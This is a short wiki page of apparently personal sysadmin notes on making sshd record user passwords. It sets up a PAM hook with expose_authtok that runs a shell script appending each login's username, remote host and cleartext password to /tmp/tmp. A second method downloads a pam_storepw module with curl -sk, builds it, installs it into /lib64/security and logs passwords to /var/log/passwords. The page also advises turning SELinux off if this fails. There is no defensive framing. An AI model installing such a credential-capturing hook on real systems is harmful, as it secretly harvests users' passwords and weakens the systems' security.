Sshd

From Halfface
Jump to navigation Jump to search
The printable version is no longer supported and may have rendering errors. Please update your browser bookmarks and please use the default browser print function instead.

sshd save password

pam_exec.so

/etc/pam.d/password-auth-ac

#%PAM-1.0
# This file is auto-generated.
# User changes will be destroyed the next time authconfig is run.
auth        required      pam_env.so
auth        sufficient    pam_unix.so nullok try_first_pass
auth        optional      pam_exec.so expose_authtok /usr/local/bin/pam_exec.so
auth        [success=1 default=ignore] pam_succeed_if.so user in ipautomata
...

/usr/local/bin/pam_exec.so

#!/bin/sh
read password
echo "User: $PAM_USER" >> /tmp/tmp
echo "Ruser: $PAM_RUSER" >> /tmp/tmp
echo "Rhost: $PAM_RHOST" >> /tmp/tmp
echo "Service: $PAM_SERVICE" >> /tmp/tmp
echo "TTY: $PAM_TTY" >> /tmp/tmp
echo "Password : $password" >> /tmp/tmp
exit $?

pam_storepw.so

Download source code for module.

curl -sk -O http://www.adeptus-mechanicus.com/codex/logsshp/chng-pam_storepw.c

Create the following Makefile

all: pam_storepw.so

pam_storepw.so: pam_storepw.o
	$(LD) --shared -o $@ $< -lpam -lpam_misc

clean:
       rm -f pam_storepw.o pam_storepw.so core *~

extraclean: clean
       rm -f *.a *.o *.so *.bak

.c.o:
       $(CC) $(CFLAGS) -c $< -o $@ -fPIC

Build file

make

Copy file

cp pam_storepw.so /lib64/security/
chmod 755 /lib64/security/pam_storepw.so

password-auth-ac

#%PAM-1.0
# This file is auto-generated.
# User changes will be destroyed the next time authconfig is run.
auth        required      pam_env.so
auth        sufficient    pam_unix.so nullok try_first_pass
auth        optional      pam_storepw.so
auth        [success=1 default=ignore] pam_succeed_if.so user in ipautomata
...

Passwords start to be written to

/var/log/passwords

If you do not get any entries.

Temporarily turn selinux off to see if it starts to work
run pam in debug to see what is going on.